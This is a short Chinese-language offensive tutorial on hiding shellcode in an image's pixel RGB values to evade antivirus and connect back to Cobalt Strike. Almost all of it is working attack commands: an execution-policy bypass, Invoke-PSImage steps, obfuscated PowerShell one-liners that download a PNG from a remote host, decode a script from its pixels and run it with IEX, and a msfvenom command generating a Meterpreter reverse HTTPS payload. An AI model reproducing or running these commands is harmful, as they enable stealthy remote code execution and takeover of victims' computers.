Shellcode 隐写到像素 RGB 免杀上线到 CobaltStrike

# 1、设置执行策略Set-ExecutionPolicy Unrestricted -Scope CurrentUser# 2、导入 ps1 文件Import-Module .Invoke-PSimage.ps1# 3、生成 shellcode 的图片Invoke-PSImage -Script .payload.ps1 -Image .saul.jpg -Out .saul.png -Web

sal a New-Object;Add-Type -A System.Drawing;$g=a System.Drawing.Bitmap((a Net.WebClient).OpenRead("http://example.com/saul.png"));$o=a Byte[] 3584;(0..13)|%{foreach($x in(0..255)){$p=$g.GetPixel($x,$_);$o[$_*256+$x]=([math]::Floor(($p.B-band15)*16)-bor($p.G -band 15))}};IEX([System.Text.Encoding]::ASCII.GetString($o[0..3550]))

sal a New-Object;Add-Type -A System.Drawing;$g=a System.Drawing.Bitmap((a Net.WebClient).OpenRead("http://192.168.2.14/saul.png"));$o=a Byte[] 3584;(0..13)|%{foreach($x in(0..255)){$p=$g.GetPixel($x,$_);$o[$_*256+$x]=([math]::Floor(($p.B-band15)*16)-bor($p.G -band 15))}};IEX([System.Text.Encoding]::ASCII.GetString($o[0..3550]))

1、msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.253.8 LPORT=5555 -f psh-reflection > msf-dayu.ps1
2、Set-ExecutionPolicy Unrestricted -Scope CurrentUser
3、Import-Module .Invoke-PSimage.ps1
4、Invoke-PSImage -Script .cs-dayu.ps1 -Image .dayu.jpg -Out .cs-dayu.png -Web